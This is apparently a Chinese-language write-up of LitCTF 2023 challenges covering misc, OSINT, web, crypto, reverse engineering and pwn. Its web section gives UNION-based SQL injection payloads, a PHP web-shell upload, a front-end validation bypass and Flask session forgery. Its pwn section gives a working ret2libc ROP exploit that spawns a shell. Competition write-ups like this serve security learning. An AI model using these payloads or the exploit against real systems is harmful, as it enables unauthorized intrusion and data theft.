Misc

签到!(初级)

image-20230712141232134

LitCTF{Welcome_t0_LitCTF2023}

What_1s_BASE (初级)

image-20230712141250144

NSSCTF{KFC_Cr4zy_Thur3day_V_me_50}

Take me hand (初级)

追踪http流

image-20230712141340474

NSSCTF{Give_y0ur_hand_to_me!!!_plz}

404notfound (初级)

winhex打开在exif里面找到

image-20230712141359408

NSSCTF{Its_404_but_1ts_n0t_a_page}

喜欢我的压缩包么 (初级)

image-20230712141425005

爆破密码为114514

image-20230712141437892

NSSCTF{Do-u-like-my-zip-p4ck?}

这羽毛球怎么只有一半啊(恼 (初级)

根据题意,直接改宽高

image-20230712141503818

NSSCTF{Fl4g_Ofcource!}

破损的图片(初级)

image-20230712141519418

补上png文件头

image-20230712141527947

image-20230712141534421

NSSCTF{May you, the beauty of this world, always shine. }

注意空格

【Minecraft】玩的开心~~~

PCL下个1.19.2进服务器挖个钻石找村民换即可

不知道为什么题目标题是mc,内容是Mincemeat,一开始还去找了游戏,发现没有这个游戏

游戏flag莫名其妙没掉了

两仪生四象 (中级)

python
1
2
3
4
5
6
7
s='坤乾兑艮兑坎坤坤巽震坤巽震艮兑坎坤震兑乾坤巽坤艮兑震巽坤巽艮坤巽艮艮兑兑艮震兑乾坤乾坤坤兑艮艮坤巽坤坤巽坎坤兑离坎震艮兑坤巽坎艮兑震坤震兑乾坤乾坎坤兑坎坤震艮离坤离乾艮震艮巽震离震坤巽兑艮兑坎坤震巽艮坤离乾艮坎离坤震巽坎坤兑坤艮兑震巽震巽坎坤巽坤艮兑兑坎震巽兑'
_hash = {"乾": "111", "兑": "011", "离": "101", "震": "001", "巽": "110", "坎": "010", "艮": "100", "坤": "000"}
a=''
for i in range(len(s)):
    a=a+_hash[s[i:i+1]]
for i in range(0,len(a),10):
print(chr(int(a[i:i+10],2)),end='')

NSSCTF{wh1ch_ag4in_pr0duced_the_3ight_Tr1grams}

(校外)ssvvgg

Sublime打开html拿到图片base64,在线转一下

image-20230712142207929

image-20230712142217785

image-20230712142225361

图片末尾拿到hint,是steghide爆破,六位数字,写个字典去爆破

python
1
2
3
with open('dic.txt','a') as f:
    for i in range(100000,999999):
        f.write(str(i)+'\n')
python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#python3运行
from subprocess import *

def foo():
    stegoFile='1.jpg'#隐写的图片
    extractFile='passwd.txt'#爆破的密码
    passFile='dic.txt'#字典

    errors=['could not extract','steghide --help','Syntax error']
    cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
    f=open(passFile,'r')

    for line in f.readlines():
        cmd=cmdFormat %(stegoFile,extractFile,line.strip())
        p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
        content=str(p.stdout.read(),'gbk')
        for err in errors:
            if err in content:
                break
        else:
            print (content),
            print ('the passphrase is %s' %(line.strip()))
            f.close()
            return

if __name__ == '__main__':
    foo()
    print ('ok')
	Pass

跑完在passwd.txt里面就有flag了

NSSCTF{svg?_base642png!&steghide!}

(校外)雪山的秘密

拿到音频,audacity看是摩斯

image-20230712142334917

音频太长了,用在线的网站识别一下

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

image-20230712142344106

得到

3.2-..3-.23-.32-32.-3..-..2-223-.32-322-..3-..2-2.2-3..-232-223-..2-.32-3.2-..3-.23-3.3-..3-.32-32.-322-.3.-.3.-33.-22.-23.-..3-.23-..2-3..-.2.-..3-2.2-3..-.23-23.-.33-.32-2.2-3..-3.2-223-322-332-3..-233-

百度一下会发现和原神里面游戏内容一模一样

中间的/可以直接删掉

.换成0

-换成空格

2换成1

3换成2

再转换成四进制

再转成文本,rot13一下得到

FORTHENATIONWECANTFORGOTTHISSKYBORNEPOWERBUTWEFAILED

根据英文再分割一下就好了

NSSCTF{FOR_THE_NATION_WE_CANT_FORGOT_THIS_SKYBORNE_POWER_BUT_WE_FAILED}

Osint

小麦果汁

找到wifi名称,百度搜索酒吧

image-20230712141621757

NSSCTF{黑客与精酿}

探姬去哪了?_1

根据第二张图片

image-20230712141738570

找到酒店是松果酒店

再根据探姬是郑州轻工业大学的,地图搜索一下一个一个试

image-20230712141742637

这里提示以高德地图为准,应该是试到农业路店就对了

flag应该是NSSCTF{松果酒店(郑州农业路店)}

这是什么地方?!

百度视图中有两个视频

image-20230712141801809

第二个视频已删除,第一个视频下面没有评论,大概率是搬运,搜索一下题目

找到原视频

image-20230712141811422

下面评论发现是工厂运煤的

视频到第四秒的时候右上角出现了集团名字

image-20230712141820676

NSSCTF{陕西有色榆林新材料集团}

探姬去哪了?_2

根据图片搜索HackingClub最近的活动

image-20230712141852815

发现有个在郑州的活动,刚好探姬在郑州

发现是在漫香喜力音乐酒吧,搜索一下郑州店

image-20230712141903578

高德刚好也是这个名字

NSSCTF{漫香音乐酒吧(农科路店)}

探姬去哪了?_0

根据图片经纬度定位

image-20230712142018952

根据题意搜索中国电信和大厦

image-20230712142029041

NSSCTF{中国电信大厦}

探姬去哪了?_3

这题全靠猜,郑州轻工业大学在郑州总共有两个校区,一个科学校区一个东风校区

然后再百度地图里面看内景,发现教学楼也就那么几个,门牌号和楼层要么相同要么高一层,去慢慢猜就好了

NSSCTF{科学校区-第1教学楼-2层-217}

WEB

我Flag呢?

源码找到flag

image-20230712142446314

Assets里面有个彩蛋

image-20230712142456089

NSSCTF{6cbcdb07-f71a-44b2-85e5-9c3d08cd5e7c}

彩蛋1 =LitCTF{First_t0_The_k3y! (1/?)

导弹迷踪

在game.js里面找到

image-20230712142537501

NSSCTF{y0u_w1n_th1s_!!!}

Follow me and hack me

image-20230712142616508

NSSCTF{86db88ea-acee-41f4-bbb3-396d668dd450}

备份文件www.zip 有彩蛋

image-20230712142635585

彩蛋3= _R3ady_Pl4yer_000ne_ (3/?)

PHP是世界上最好的语言!!

一开始不知道可以直接执行php,后面发现直接执行系统命令

image-20230712142723789

image-20230712142729179

image-20230712142750663

image-20230712142756283

NSSCTF{7b8b6951-a8e7-4baf-ba10-13e5aba40d04}

Vim yyds

题目提示vim泄露,要么swp要么swo

.index.php.swp拿到flag

image-20230712142822669

NSSCTF{Give_Me_Your_Flag}

作业管理系统

F12拿到账密登录

image-20230712142845505

发现里面好多功能,啥也没过滤,那就创建个shell文件

image-20230712142906909

image-20230712142915186

访问shell.php发现正常

image-20230712142930815

蚁剑连通,在根目录下找到flag

image-20230712142939560

image-20230712142945839

NSSCTF{d2bddefc-df0b-4a03-b146-adbbdc3d01a1}

这里还有个彩蛋,要仔细看发现在上传文件处有个探姬的github地址,访问找到彩蛋2

image-20230712142959700

image-20230712143008169

彩蛋2=_S0_ne3t? (2/?)

这是什么?SQL !注一下 !

很友好的sql注入,在网页上给出了sql查询语句

image-20230712143037094

因为中间get传进去的id已经用点拼接上去了,因此直接闭合括号就可以在后面进行注入了

image-20230712143102472

image-20230712143108037

这里发现可回显2列,还查出了彩蛋4=F1rst_to_Th3_eggggggggg!}

下面就是正常的sql查询流程了,这边要注意在当前数据库没有flag,要查别的数据库

?id=1)))))) or 1=1 union select 1, group_concat(schema_name) from information_schema.schemata--+

image-20230712143128128

?id=1)))))) or 1=1 union select 1, group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

image-20230712143140328

?id=1)))))) or 1=1 union select 1, group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+

image-20230712143153736

?id=1)))))) or 1=1 union select 1,flag from ctftraining.flag--+

image-20230712143209559

NSSCTF{36ffbe5c-f1ab-47b5-a00b-f8f3f1a62196}

Http pro max plus

打开页面发现要本地访问,xff绕发现不行

image-20230712143236359

百度了一下找到很多伪造方法,参考https://blog.csdn.net/cib439/article/details/122075428

这里用Client-IP伪造

image-20230712143246122

Referer绕

image-20230712143257032

User-Agent修改

image-20230712143307375

这个代理找了好久,最后发现是数据包过一层代理会加上的报文头Via

image-20230712143318479

访问wtfwtfwtfwtf.php

这三个都看了没啥用,源码找到下一步

image-20230712143329925

image-20230712143338212

NSSCTF{bec664fd-0886-4144-8588-9f8fa709eca9}

Ping

正常ping

image-20230712143421774

想在后面拼接,发现什么都被过滤了

image-20230712143434267

发现是前端弹窗,在前端找到过滤源码

image-20230712143444270

但是发现这里是检测ip格式的,想不到绕过,但是想起验证在前端的话直接把submit要发生的事件给去掉就好了嘛,或者禁用js也行

image-20230712143455909

image-20230712143503327

image-20230712143518414

NSSCTF{8f0ab82c-8767-4c94-9c3e-543287388142}

1zjs

在js里找到关键

image-20230712143542984

发现是JSFuck ,放控制台跑就好了

image-20230712143551849

NSSCTF{2f149861-1e36-44ee-8529-6d4ee284f41a}

彩蛋

把前面的四个彩蛋拼接一下就好了

彩蛋1 =LitCTF{First_t0_The_k3y! (1/?)

彩蛋2=_S0_ne3t? (2/?)

彩蛋3=R3ady_Pl4yer_000ne (3/?)

彩蛋4=F1rst_to_Th3_eggggggggg!}

LitCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

就当无事发生

一开始在博客里面绕了半天,啥也没找到,后来就去探姬的github里面找

image-20230712143650412

这里也找不到任何东西,联想到重新部署,那应该是有历史commit的,去历史里面暴搜

image-20230712143658904

NSSCTF{g1thub_c0mmit_1s_s0_us3ful}

Flag点击就送!

一开始随便填个123,后面发现有个拿flag的按钮,显示只有管理员才能拿flag

image-20230712143733241

用dirsearch和御剑扫了一下,也没扫到任何文件泄露

想到要管理员才能拿flag,但是admin登录也不行

image-20230712143743016

然后在cookie里面发现session,第一小段拿去base64解密一下,发现是{“name”:”123”}

image-20230712143749816

image-20230712143756033

这个格式很像jwt,但是第二段不能base64解出来,因为jwt是有个字段是公开加密方式的base64,百度搜session伪造,结合url后面的/hello,/flag,应该是flask的session伪造

flask-session-cookie-manager可以加密解密,但是需要密钥去伪造

发现解密完就是第一个部分

image-20230712143808459

那么我们用name是admin,猜测密钥是LitCTF去伪造尝试

image-20230712143816341

image-20230712143823679

image-20230712143827553

NSSCTF{c7ca728b-6981-4438-b5d4-221d52a58f07}

Crypto

Hex?Hex!(初级)

是hex也是base16

image-20230712143852784

NSSCTF{tai111coollaaa!}

梦想是红色的 (初级)

社会主义核心价值观编码

image-20230712143910468

NSSCTF{为之则易,不为则难}

原来你也玩原神 (初级)

提瓦特大陆语言

image-20230712143929307

NSSCTF{YUANLAINIYEWANYUANSHENWWW}

家人们!谁懂啊,RSA签到都不会 (初级)

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Util.number import *
from gmpy2 import * 
p = 
12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 
12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 
108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
e = 65537
n = p*q
phi = (p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))

NSSCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

factordb (中级)

image-20230712144017477

python
1
2
3
4
5
6
7
8
9
10
11
12
from Crypto.Util.number import *
from gmpy2 import * 
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
c = 
87677652386897749300638591365341016390128692783949277305987828177045932576708
e = 65537
n = p*q
phi = (p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))

NSSCTF{factordb!!!}

(校外)P_Leak

参考L佬博客https://lazzzaro.github.io/2020/05/06/crypto-RSA/

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import gmpy2 as gp

e = 65537
n = 
50612159190225619689404794427464916374543237300894011803225784470008992781409447214236779975896311093686413491163221778479739252804271270231391599602217675895446538524670610623369953168412236472302812808639218392319634397138871387898452935081756580084070333246950840091192420542761507705395568904875746222477
dp = 
5892502924236878675675338970704766304539618343869489297045857272605067962848952532606770917225218534430490745895652561015493032055636004130931491316020329
c = 
39257649468514605476432946851710016346016992413796229928386230062780829495844059368939749930876895443279723032641876662714088329296631207594999580050131450251288839714711436117326769029649419789323982613380617840218087161435260837263996287628129307328857086987521821533565738409794866606381789730458247531619

for x in range(1, e):
	if(e*dp%x==1):
		p=(e*dp-1)//x+1
		if(n%p!=0):
			continue
		q=n//p
		phin=(p-1)*(q-1)
		d=gp.invert(e, phin)
		m=gp.powmod(c, d, n)
		if(len(hex(m)[2:])%2==1):
			continue
		print('--------------')
		print(m)
		print(hex(m)[2:])
		print(bytes.fromhex(hex(m)[2:]))

NSSCTF{Prim3_1s_Le@k!!!!!}

yafu (中级)

image-20230712144150820

image-20230712144155522

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from Crypto.Util.number import *
from gmpy2 import *

n = 15241208217768849887180010139590210767831431018204645415681695749294131435566140166245881287131522331092026252879324931622292179726764214435307
c = 12608550100856399369399391849907846147170257754920996952259023159548789970041433744454761458030776176806265496305629236559551086998780836655717
e = 65537
P1 = 2201440207
P2 = 3354884521
P3 = 2719600579
P4 = 4171911923
P5 = 2585574697
P6 = 2151018733
P7 = 3989697563
P8 = 2906576131
P9 = 2758708999
P10 = 3355651511
P11 = 4021078331
P12 = 2315495107
P13 = 4044505687
P14 = 2767137487
P15 = 2923522073
phi=(P1-1)*(P2-1)*(P3-1)*(P4-1)*(P5-1)*(P6-1)*(P7-1)*(P8-1)*(P9-1)*(P10-1)*(P11-1)*(P12-1)*(P13-1)*(P14-1)*(P15-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))

NSSCTF{Mu1tiple_3m4ll_prim5_fac7ors_@re_uns4f5}

(校外)md5的破解

image-20230712144228498

python
1
2
3
4
5
6
7
8
9
10
11
12
from Crypto.Util.number import *
from hashlib import md5

dic=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
for i in dic:
	for j in dic:
		for k in dic:
			for m in dic:
				flag='LitCTF{md5can'+i+j+'3de'+k+'rypt213thoughcr'+m+'sh}'
				m=md5(flag.encode()).hexdigest()
				if m=='496603d6953a15846cd7cc476f146771':
					print(flag)

NSSCTF{md5can123dexrypt213thoughcrpsh}

(校外)e的学问

参考https://www.bilibili.com/read/cv13437297

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import gmpy2
from Crypto.Util.number import *


# 当e约去公约数后与phi互素
def decrypt(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gmpy2.gcd(e, phi)
    d = gmpy2.invert(e // t, phi)
    m = pow(c, d, n)
    print(m)
    msg = gmpy2.iroot(m, t)
    print(msg)
    if msg[1]:
        print(long_to_bytes(msg[0]))

p= 86053582917386343422567174764040471033234388106968488834872953625339458483149
q= 72031998384560188060716696553519973198388628004850270102102972862328770104493
e= 74
c= 3939634105073614197573473825268995321781553470182462454724181094897309933627076266632153551522332244941496491385911139566998817961371516587764621395810123

decrypt(p, q, e, c)

NSSCTF{e_1s_n0t_@_Prime}

(校外)我测你vva

python
1
2
3
4
5
6
cipher='HYEQJvPZ~X@+Bp'
for i in range(0,len(cipher)):
    if i%2==0:
        print(chr(ord(cipher[i:i+1])-i),end='')
    else:
        print(chr(ord(cipher[i:i+1])+i),end='')

NSSCTF{Java666}

The same common divisor (高级)

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from Crypto.Util.number import *
from gmpy2 import * 

e=65537
n1= 9852079772293301283705208653824307027320071498525390578148444258198605733768947108049676831872672654449631852459503049139275329796717506126689710613873813880735666507857022786447784753088176997374711523987152412069255685005264853118880922539048290400078105858759506186417678959028622484823376958194324034590514104266608644398160457382895380141070373685334979803658172378382884352616985632157233900719194944197689860219335238499593658894630966428723660931647038577670614850305719449893199713589368780231046895222526070730152875112477675102652862254926169713030701937231206405968412044029177246460558028793385980934233
n3= 4940268030889181135441311597961813780480775970170156650560367030148383674257975796516865571557828263935532335958510269356443566533284856608454193676600884849913964971291145182724888816164723930966472329604608512023988191536173112847915884014445539739070437180314205284883149421228744714989392788108329929896637182055266508625177260492776962915873036873839946591259443753924970795669864031580632650140641456386202636466624658715315856453572441182758855085077441336516178544978457053552156714181607801760605521338788424464551796638531143900048375037218585999440622490119344971822707261432953755569507740550277088437182
c1= 7066425618980522033304943700150361912772559890076173881522840300333719222157667104461410726444725540513601550570478331917063911791020088865705346188662290524599499769112250751103647749860198318955619903728724860941709527724500004142950768744200491448875522031555564384426372047270359602780292587644737898593450148108629904854675417943165292922990980758572264063039172969633878015560735737699147707712154627358077477591293746136250207139049702201052305840453700782016480965369600667516646007546442708862429431724013679189842300429421340122052682391471347471758814138218632022564279296594279507382548264409296929401260
c2= 854668035897095127498890630660344701894030345838998465420605524714323454298819946231147930930739944351187708040037822108105697983018529921300277486094149269105712677374751164879455815185393395371001495146490416978221501351569800028842842393448555836910486037183218754013655794027528039329299851644787006463456162952383099752894635657833907958930587328480492546831654755627949756658554724024525108575961076341962292900510328611128404001877137799465932130220386963518903892403159969133882215092783063943679288192557384595152566356483424061922742307738886179947575613661171671781544283180451958232826666741028590085269
n2=n1^n3
p=gcd(n1,n2)
q1=n1//p
q2=n2//p
phi1=(p-1)*(q1-1)
phi2=(p-1)*(q2-1)
d1=invert(e,phi1)
d2=invert(e,phi2)
m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1))
print(long_to_bytes(m2))

NSSCTF{TH3_Tw0_nUmb3rs_H@v3_The_sAme_D1v1s0r!!}

你是我的关键词(Keyworld) (初级)

单表对应,keyword是YOU

ABCDEFGHIJKLMNOPQRSTUVWXYZ

YOUABCDEFGHIJKLMNPQRSTVWXZ

一一对应即可

IFRURC{X0S_YP3_JX_HBXV0PA}

LITCTF{Y0U_AR3_MY_KEYW0RD}

flag NSSCTF{Y0U_AR3_MY_KEYW0RD}

(校外)Is this only base?

一看就是栅栏,偏移题目给出23

image-20230712144453918

base64解密发现应该要凯撒

image-20230712144505626

image-20230712144512503

NSSCTF{LeT_Us_H4V3_fU0!!!!!}

(校外)Virginia

维吉尼亚密码爆破

https://www.guballa.de/vigenere-solver

image-20230712144534547

得到的明文不完整,再去在线解密一下

得到

There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others’shoes.If you feel that it hurts you,it probably hurts the other person, too.The happiest of people don’t necessarily have the best of everything;they just make the most of everything that comes along their way.Happiness lies for those who cry,those who hurt, those who have searched,and those who have tried,for only they can appreciate the importance of people,who have touched their lives.Love begins with a smile,grows with a kiss and ends with a tear.The brightest future will always be based on a forgotten past, you can’t go on well in lifeuntil you let go of your past failures and heartaches.When you were born,you were crying and everyone around you was smiling.Live your life so that when you die,you're the one who is smiling and everyone around you is crying. Please send this message to those people who mean something to you,to those who have touched your life in one way or another,to those who make you smile when you really need it,to those that make you see the brighter side of things when you are really down,to those who you want to let them know that you appreciate their friendship.And if you don’t, don’t worry,nothing bad will happen to you,you will just miss out on the opportunity to brighten someone’s day with this message.My password is not a regular Caesar password,and the enc flag=[86, 116, 128, 80, 98, 85, 139, 122, 134, 114, 125, 136, 117, 123, 129, 127, 128, 128, 142, 130, 140, 147, 127, 132, 131, 136, 151, 134, 152, 164] -Caesar

发现最后是个凯撒,但是不是个常规的凯撒,前几位对照LitCTF,发现每一位多减去了一个下标值

python
1
2
3
flag=[86,116,128,80,98,85,139,122,134,114,125,136,117,123,129,127,128,128,142,130,140,147,127,132,131,136,151,134,152,164]
for i in range(len(flag)):
print(chr(flag[i]-10-i),end='')

NSSCTF{it_is_different_caesar}

(校外)babyLCG

典型LCG,参考http://www.manongjc.com/detail/22-hpzrquvdaforjqj.html

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from Crypto.Util.number import *
from gmpy2 import gcd,invert

s =[699175025435513913222265085178805479192132631113784770123757454808149151697608216361550466652878, 193316257467202036043918706856603526262215679149886976392930192639917920593706895122296071643390, 1624937780477561769577140419364339298985292198464188802403816662221142156714021229977403603922943, 659236391930254891621938248429619132720452597526316230221895367798170380093631947248925278766506, 111407194162820942281872438978366964960570302720229611594374532025973998885554449685055172110829, 1415787594624585063605356859393351333923892058922987749824214311091742328340293435914830175796909, 655057648553921580727111809001898496375489870757705297406250204329094679858718932270475755075698, 1683427135823894785654993254138434580152093609545092045940376086714124324274044014654085676620851, 492953986125248558013838257810313149490245209968714980288031443714890115686764222999717055064509, 70048773361068060773257074705619791938224397526269544533030294499007242937089146507674570192265]
t = []
for i in range(9):
    t.append(s[i]-s[i-1])
all_n = []
for i in range(7):
    all_n.append(gcd((t[i+1]*t[i-1]-t[i]*t[i]), (t[i+2]*t[i]-t[i+1]*t[i+1])))

for n in all_n:
    n=abs(n)
    if n==1:
        continue
    a=(s[2]-s[1])*invert((s[1]-s[0]),n)%n
    ani=invert(a,n)
    b=(s[1]-a*s[0])%n
    seed = (ani*(s[0]-b))%n
    plaintext=seed
print(long_to_bytes(plaintext))

NSSCTF{31fcd7832029a87f6c9f760fcf297b2f}

(校外)隐晦的聊天记录

一次一密,消息和密文用异或的形式,多次传递只用一个密钥

因此m1^m2=c1^c2

python
1
2
3
4
5
6
7
from Crypto.Util.number import *

c1=0x6c73d5240a948c86981bc294814d
m1=bytes_to_long(b'attack at dawn')
m2=bytes_to_long(b'Monday or Thur')
c2=m1^c1^m2
print(hex(c2))

NSSCTF{4068cf2108868c889e1bf29d8351}

REVERSE

世界上最棒的程序员

image-20230712144728002

NSSCTF{I_am_the_best_programmer_ever}

ez_XOR

进到主函数,找到关键点XOR函数

image-20230712144745041

跟进发现异或的数字是3*3

image-20230712144809040

写个解密脚本

python
1
2
3
s='E`}J]OrQF[V8zV:hzpV}fVF[t'
for i in range(len(s)):
print(chr(ord(s[i:i+1])^9),end='')

NSSCTF{XOR_1s_3asy_to_OR}

enbase64

进到主函数,发现关键比较位置是base64函数和basecheck函数

image-20230712144840313

进到base64函数后,里面是正常的base64,但是这里有个basechange,将刚刚的base64表传进去了

image-20230712144850689

进去发现这个函数在更换我们的字符表

image-20230712144859642

总共替换了48次,每一次都是依照上面v3数组里存储的顺序从原来的字符表中取出相应的字符,然后将其按顺序从0-63放在新表中,再从新表重复上述操作,那么我们先写个脚本写出替换完的字符表顺序

python
1
2
3
4
5
6
7
8
9
10
11
12
v3=[16, 34, 56, 7, 46, 2, 10, 44, 20, 41, 59, 31, 51, 60, 61, 26, 5, 40, 21, 38, 4, 54, 52, 47, 3, 11, 58, 48, 32, 15, 49, 14, 37, 0, 55, 53, 24, 35, 18, 25, 33, 43, 50, 39, 12, 19, 13, 42, 9, 17, 28, 30, 23, 36, 1, 22, 57, 63, 8, 27, 6, 62, 45, 29]
lists=[[] for _ in range(64)]
Source="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
for i in range(48):
    for j in range(64):
        if i==0:
            lists[i].append(Source[v3[j]:v3[j]+1])
        else:
            lists[i].append(lists[i-1][v3[j]])

for i in lists[47]:
    print(i,end='')

密文在basecheck函数里面

image-20230712144923633

再用替换base64表的base64解密那个密文

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
s = "gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND"     
#这里是被修改后的表 例:
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234{}789+/"

def My_base64_encode(inputs):
	# 将字符串转化为2进制
	bin_str = []
	for i in inputs:
		x = str(bin(ord(i))).replace('0b', '')#这里是输入正常字符串使用 例:'MTIzNDU2'
		#x = str(bin((i))).replace('0b', '') #这里是输入十六进制是使用 例:b'\x9e\x9b\x9c\xb5\xfe\x70\xd3\x0f\xb2\xd1\x4f\x9c\x02\x7f\xab\xde\x59\x65\x63\xe7\x40\x9d\xcd\xfa\x04'
		#上面两句二选一
		bin_str.append('{:0>8}'.format(x))
	#print(bin_str)
	# 输出的字符串
	outputs = ""
	# 不够三倍数,需补齐的次数
	nums = 0
	while bin_str:
		#每次取三个字符的二进制
		temp_list = bin_str[:3]
		if(len(temp_list) != 3):
			nums = 3 - len(temp_list)
			while len(temp_list) < 3:
				temp_list += ['0' * 8]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 将三个8字节的二进制转换为4个十进制
		temp_str_list = []
		for i in range(0,4):
			temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
		#print(temp_str_list)
		if nums:
			temp_str_list = temp_str_list[0:4 - nums]
			
		for i in temp_str_list:
			outputs += s[i]
		bin_str = bin_str[3:]
	outputs += nums * '='
	print("Encrypted String:\n%s "%outputs)
	
def My_base64_decode(inputs):
	# 将字符串转化为2进制
	bin_str = []
	for i in inputs:
		if i != '=':
			x = str(bin(s.index(i))).replace('0b', '')
			bin_str.append('{:0>6}'.format(x))
	#print(bin_str)
	# 输出的字符串
	outputs = ""
	nums = inputs.count('=')
	while bin_str:
		temp_list = bin_str[:4]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 补足8位字节
		if(len(temp_str) % 8 != 0):
			temp_str = temp_str[0:-1 * nums * 2]
		# 将四个6字节的二进制转换为三个字符
		for i in range(0,int(len(temp_str) / 8)):
			outputs += chr(int(temp_str[i*8:(i+1)*8],2))
		bin_str = bin_str[4:]	
	print("Decrypted String:\n%s "%outputs)
	
print()
print("     -------------------------------------")
print("     |    (1)encode         (2)decode    |")	
print("     -------------------------------------")
print()


num = input("Please select the operation you want to perform:\n")
if(num == "1"):
	input_str = input("Please enter a string that needs to be encrypted: \n") # 这句在终端中输入要加密的数据
	My_base64_encode(input_str)             #这里传入要加密的数据
else:
	input_str = input("Please enter a string that needs to be decrypted: \n") # 这句在终端中输入要解密的数据
	My_base64_decode(input_str)     #这里传入要解密的数据

image-20230712144949804

NSSCTF{B@5E64_l5_tooo0_E3sy!!!!!}

snake

pyc文件少了魔数头,文件名是python3.7版本的,找个魔数头补上,uncompyle6或者在线反编译都行

image-20230712145014258

flag解密如源码

image-20230712145023521

python
1
2
3
4
5
flag = [30, 196, 52, 252, 49, 220, 7, 243, 3, 241, 24, 224, 40, 230, 25, 251, 28, 233, 40, 237, 4, 225, 4, 215, 40, 231, 22, 237, 14, 251, 10, 169]
for i in range(0, len(flag), 2):
    flag[i], flag[i + 1] = flag[(i + 1)] ^ 136, flag[i] ^ 119
for i in flag:
    print(chr(i),end='')

NSSCTF{python_snake_is_so_easy!}

For Aiur

也是python反编译,不过flag藏在出题人自己编写的文件中调用了

先解包

image-20230712145051303

再补魔数头,如果struct里没有的话,就去base_library里面随便打开一个pyc加上即可

image-20230712145059088

源码全看也找不到flag,但是这里有个ch库是出题人自己编写的

image-20230712145112883

在解包之后的文件里找到ch.pyc

image-20230712145122038

将其头补齐再进行反编译

image-20230712145130982

找到flag解密过程

image-20230712145139498

python
1
2
3
4
5
6
7
8
9
10
11
可以看出num应该就是24

lis = []
enc = [98, 77, 94, 91, 92, 107, 125, 66, 87, 70, 113, 92, 83, 70, 85, 81, 19, 21, 109, 99, 87, 107, 127, 65, 65, 64, 109, 87, 93, 90, 65, 64, 64, 65, 81, 3, 109, 85, 86, 80, 91, 64, 91, 91, 92, 0, 94, 107, 66, 77, 94, 91, 92, 71]
flag='LitCTF{'
k='24'
for i in range(len(enc)):
    flag += chr(ord(k[i % len(k)]) ^ enc[i])
    lis.append(ord(k[i % len(k)]) ^ enc[i]) 
flag+='}'
print(flag)

NSSCTF{Pylon_OverCharge!!_We_Must_construc7_addition4l_pylons}

Pwn

只需要nc一下~

nc一下,根目录下的那个是假的,真的在环境里面

image-20230712145215217

NSSCTF{349b27a0-b7f7-4071-975c-0e372a343bb9}

口算题卡

100道计算题,计算完就好了

image-20230712145232067

NSSCTF{3d665932-3db3-45c4-8271-10211c34e5fc}

狠狠的溢出捏~

Ida反编译,简单的查看一下程序。很明显,存在stack 溢出,最基本的rop链思路,先leak libc地址,跳转到main函数重新打一次即可getshell

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwncy import *
context(log_level = "debug",arch = 'amd64',os = 'linux')

p,elf,libc = load("pwn4",ip_port = "node5.anna.nssctf.cn:28364",remote_libc = 'libc-2.31.so')
debug(p,'no-tmux',0x400768)
main = 0x4006b0
pop_rdi = 0x4007d3
ret = 0x0000000000400556
payload1 = flat({
    0x60: b"deadbeef",
    0x68: pop_rdi,
    0x70: [elf.got['puts'],elf.plt['puts']],
    0x80: main
    },filler = b"\x00")
sla("Leave your message:",payload1)

puts_addr = recv_libc()
system,binsh,libc_base = local_search("puts",puts_addr,libc)

payload2 = flat({
    0x60: b"deadbeef",
    0x68: [ret,pop_rdi],
    0x78: [binsh,system],
    0x88: main
    },filler = b"\x00")
sla("Leave your message:",payload2)
itr()

image-20230712145313746

Ezlogin

